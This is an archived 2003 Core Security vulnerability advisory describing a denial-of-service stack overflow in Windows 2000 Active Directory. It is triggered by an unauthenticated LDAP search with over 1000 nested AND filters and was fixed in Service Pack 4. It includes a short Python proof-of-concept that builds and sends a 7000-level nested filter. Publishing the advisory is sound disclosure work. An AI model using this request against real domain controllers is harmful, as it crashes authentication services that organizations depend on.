core.active.txt

2003-07-04T00:00:00
ID PACKETSTORM:31300
Type packetstorm
Reporter Eduardo Arias
Modified 2003-07-04T00:00:00

Description

                                        
                                            ` Core Security Technologies Advisory  
http://www.coresecurity.com  
  
Active Directory Stack Overflow  
  
  
Date Published: 2003-07-02  
  
Last Update: 2003-07-02  
  
Advisory ID: CORE-2003-0305-03  
  
Bugtraq ID: 7930  
  
CVE Name: None currently assigned.  
  
Title: Active Directory Stack Overflow  
  
Class: Boundary Error Condition  
  
Remotely Exploitable: Yes  
  
Locally Exploitable: Yes  
  
Advisory URL:  
http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10  
  
Vendors contacted:  
- Microsoft  
. Core Notification: 2003-05-16  
. Notification acknowledged by Microsoft: 2003-05-19  
. Issue fixed in Windows 2000 Service Pack 4: 2003-06-26  
  
Release Mode: COORDINATED RELEASE  
  
  
*Vulnerability Description:*  
  
Active Directory, which is an essential component of the Windows 2000  
architecture, presents organizations with a directory service designed  
for distributed computing environments. Active Directory allows organizations  
to centrally manage and share information on network resources and users  
while acting as the central authority for network security.  
  
The directory services provided by Active Directory are based on the  
Lightweight Directory Access Protocol (LDAP) and thus Active Directory  
objects can be stored and retrieved using the LDAP protocol.  
  
A vulnerability in Active Directory allows an attacker to crash and force  
a reboot of any Windows 2000 Server running the Active Directory service.  
  
The vulnerability can be triggered when an LDAP version 3 search request  
with more than 1000 "AND" statements is sent to the server, resulting in a  
stack overflow and subsequent crash of the Lsaas.exe service.  
  
This in turn, will force a domain controller to stop responding, thus  
making possible a denial of service attack against it. The LDAP request  
does not need to be authenticated.  
  
The possibility of exploiting this vulnerability to execute arbitrary code  
on a vulnerable server has not been proved but is not discarded.  
  
  
*Vulnerable Packages:*  
  
Windows 2000 Server with Active Directory (Service Pack 3).  
  
  
*Solution/Vendor Information/Workaround:*  
  
This issue is fixed in Windows 2000 Service Pack 4, which can be  
donwloaded from:  
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/  
  
Further information about the vulnerability can be obtained from  
http://support.microsoft.com/default.aspx?kbid=319709  
  
  
*Credits:*  
  
This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo  
Quesada and Damian Saura from Core Security Technologies during Bugweek 2003  
(March 3-7, 2003).  
  
  
*Technical Description - Exploit/Concept Code:*  
  
A 'search request' created using LDAP version 3, constructed with more than  
1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash  
and rebooting the machine within 30 seconds.  
  
To reproduce the stack overflow, you need to create a 'search request' to  
an Active Directory server. The 'search request' must search for a non existent  
machine within the Domain Controller that you've previously bind to.  
  
It must be composed with more than 1000 AND statements but it is supposed that  
OR, GE, LE and other binary operators will yield the same results.  
  
Example of a Python script that creates such a request:  
  
------------------------------------  
class ActiveDirectoryDOS( Ldap ):  
  
def __init__(self):  
self._s = None  
self.host = '192.168.0.1'  
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'  
self.port = 389  
self.buffer = ''  
self.msg_id = 1  
Ldap.__init__()  
  
def generateFilter_BinaryOp( self, filter ):  
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()  
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )  
return filterBuffer  
  
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):  
simpleBinOp = self.generateFilter_BinaryOp( filter )  
filterBuffer = simpleBinOp  
for cnt in range( 0, numTimes ):  
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )  
return filterBuffer  
  
  
def searchSub( self, filterBuffer ):  
  
self.bindRequest()  
self.searchRequest( filterBuffer )  
  
def run(self, host = '', basedn = '', name = '' ):  
  
# the machine must not exist  
machine_name = 'xaxax'  
  
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)  
  
# execute the anonymous query  
print 'executing query'  
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )  
self.searchSub( filterBuffer )  
  
------------------------------------  
  
  
*About Core Security Technologies*  
  
Core Security Technologies develops strategic security solutions for  
Fortune 1000 corporations, government agencies and military  
organizations. The company offers information security software and  
services designed to assess risk and protect and manage information  
assets.  
Headquartered in Boston, MA, Core Security Technologies can be reached  
at 617-399-6980 or on the Web at http://www.coresecurity.com.  
  
To learn more about CORE IMPACT, the first comprehensive penetration  
testing framework, visit:  
http://www.coresecurity.com/products/coreimpact  
  
  
*DISCLAIMER:*  
  
The contents of this advisory are copyright (c) 2003 CORE Security  
Technologies and may be distributed freely provided that no fee is  
charged for this distribution and proper credit is given.  
  
$Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $  
  
  
`